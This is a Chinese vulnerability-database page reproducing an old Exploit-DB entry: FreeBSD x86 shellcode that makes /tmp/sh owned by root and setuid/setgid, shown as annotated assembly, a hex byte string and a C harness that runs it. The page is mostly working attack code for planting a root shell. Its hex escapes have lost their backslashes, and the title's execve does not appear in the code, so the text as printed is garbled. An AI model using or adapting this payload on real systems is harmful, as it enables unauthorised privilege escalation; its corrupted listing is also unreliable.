FreeBSD/x86 – chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)-安全小百科

FreeBSD/x86 – chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)

漏洞ID	1054673	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	FreeBSD_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13276

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
 * FreeBSD shellcode
 * chown("/tmp/sh", 0, 0); chmod("/tmp/sh", 06755);
 * 44 bytes
 * 
 * Claes M. Nyberg 20020209
 *
 * <[email protected]>, <[email protected]>
 */

/*************************************************************
void
main(void)
{
__asm__("
          xor      %eax, %eax      # eax = 0 
          pushl    %eax            # string ends with NULL 
          pushl    $0x68732f2f     # push 'hs//' (//sh) 
          pushl    $0x706d742f     # push 'pmt/' (/tmp) 
          movl     %esp, %ebx      # ebx = &string[0]  
          push     %eax            # 0 
          push     %eax            # 0 
          push     %ebx            # /tmp/sh 
          push     %eax            # Dummy 
          mov      $0x10, %al      # eax = 16 = chown 
          int      $0x80           # chown(/tmp/sh, 0, 0); 
          xor      %eax, %eax      # eax = 0
          or       $0xded, %ax     # eax = 06755
          pushl    %eax            # 06755 
          push     %ebx            # /tmp/sh 
          pushl    %eax            # dummy 
          xor      %eax, %eax      # eax = 0
          mov      $0xf, %al       # eax = 15 = chmod 
          int      $0x80           # chmod(/tmp/sh, 06755); 
          mov      $0x1, %al       # eax = 1 = exit
		  push     %eax            # exit value = 1
          push     %eax            # Dummy
          int      $0x80           # exit(1);
    ");
}

*************************************************************/

#include <stdio.h>
#include <string.h>

static char freebsd_code[] =
		"x31xc0"              /* xor      %eax, %eax  */
		"x50"                  /* pushl    %eax        */
		"x68x2fx2fx73x68"  /* pushl    $0x68732f2f */
		"x68x2fx74x6dx70"  /* pushl    $0x706d742f */
		"x89xe3"              /* movl     %esp, %ebx  */
		"x50"                  /* pushl    %eax        */
		"x50"                  /* pushl    %eax        */
		"x53"                  /* pushl    %ebx        */
		"x50"                  /* pushl    %eax        */
		"xb0x10"              /* mov      $0x10, %al  */
		"xcdx80"              /* int      $0x80       */
		"x31xc0"              /* xor      %eax, %eax  */
		"x66x0dxedx0d"      /* or       $0xded, %ax */
		"x50"                  /* pushl    %eax        */
		"x53"                  /* push     %ebx        */
		"x50"                  /* pushl    %eax        */
		"x31xc0"              /* xor      %eax, %eax  */
		"xb0x0f"              /* mov      $0xf, %al   */
		"xcdx80"              /* int      $0x80       */
        "xb0x01"              /* mov      $0x1, %al   */
        "x50"                  /* push     %eax        */
        "x50"                  /* push     %eax        */
        "xcdx80";             /* int      $0x80       */

static char _freebsd_code[] =
        "x31xc0x50x68x2fx2fx73x68"
        "x68x2fx74x6dx70x89xe3x50"
        "x50x53x50xb0x10xcdx80x31"
        "xc0x66x0dxedx0dx50x53x50"
        "x31xc0xb0x0fxcdx80xb0x01"
        "x50x50xcdx80";

void
main(void)
{
    void (*code)() = (void *)_freebsd_code;
    printf("strlen code: %dn", strlen(freebsd_code));
    code();
}

// milw0rm.com [2004-09-26]

相关推荐: BSD Nvi Format String Vulnerability

BSD Nvi Format String Vulnerability 漏洞ID 1102803 漏洞类型 Input Validation Error 发布时间 2001-10-20 更新时间 2001-10-20 CVE编号 N/A CNNVD-ID N/…

文章版权归作者所有，未经允许请勿转载。

THE END